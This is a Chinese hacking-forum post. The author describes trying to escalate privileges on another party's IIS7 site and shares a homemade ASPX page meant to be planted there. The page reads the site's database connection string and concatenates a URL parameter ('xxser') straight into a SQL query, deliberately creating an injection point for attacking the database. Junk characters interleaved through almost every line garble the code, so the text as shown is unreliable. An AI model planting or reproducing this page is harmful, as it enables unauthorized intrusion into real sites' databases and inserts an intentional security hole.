昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。6 E5 ?/ x& z* H7 V) o4 t2 k) U) B
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。" z7 A/ N# h) i" x# j# n
代码量不多,自己写个拉倒了。烦死了。& B. q$ ~/ m, Z1 M" E% k: Y. c" e
8 m6 j7 s! R, f; p0 Y3 v7 \" a1 [- N: |+ |0 u2 m; _3 l; g5 E: v3 w
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">8 _/ z, }) q. V+ S4 G' p7 q
<html xmlns="http://www.w3.org/1999/xhtml">: r; j: v% u" H C1 E# B* {8 f" M
<head runat="server">3 Z- |7 A8 [" m$ H
<title>暗影aspx构造注射专用页面</title>0 \0 d4 x- J& x1 M0 N# x
</head>
) d4 S% }* A. c8 c<body>& Q1 A Y0 L1 a
<form id="form1" runat="server">
! K. [7 h' e* h a, ]* ^- S <div>1 ?& a( k) ~( C5 o- w' y
<script language="c#" runat="server">: E9 B# n }, \1 B! `+ C! f5 z3 s% Z# g
8 V Q7 W8 t( J( I- V: z: h
void page_init(object sender, EventArgs e)! v0 [$ B, q8 V# w. K$ j
{2 `# d6 p* U6 U! \3 y9 b! k' G
( D& w5 J# o3 m/ I8 Z System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 X9 x/ N& G2 m" s" t: D
# p4 m3 p0 ?, }2 m5 C$ a! K7 J conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
0 p0 d! U* s1 N! G2 U# E conn.Open();( K# ? [/ V M! L
# A" S2 h2 |) u string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
+ }4 z+ r9 F5 _* @* _ % V3 O$ s! O( r
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
* a7 P6 A; U9 `5 m$ q int x = command.ExecuteNonQuery();
; G: b9 P+ j2 I: z# Z Response.Write(i+"\n");
: X4 u9 l8 i4 i! N% H Response.Write(x);8 V( G |( ~/ n% h( r
conn.Close();" p/ @+ [4 K. S7 M; k
}
' Y" d$ c9 a5 m1 E 0 F% v3 Q# N7 Q7 [
</script>3 K* o9 P! [( c: ]; u: {' g- J4 ^
</div>% u9 r1 C8 @2 u9 J4 l
</form>
% U% X5 t+ L! h+ @</body>
8 N( i8 i( w& t3 y- }0 G2 f( R</html> Y$ C* o, O) U* R& ?
|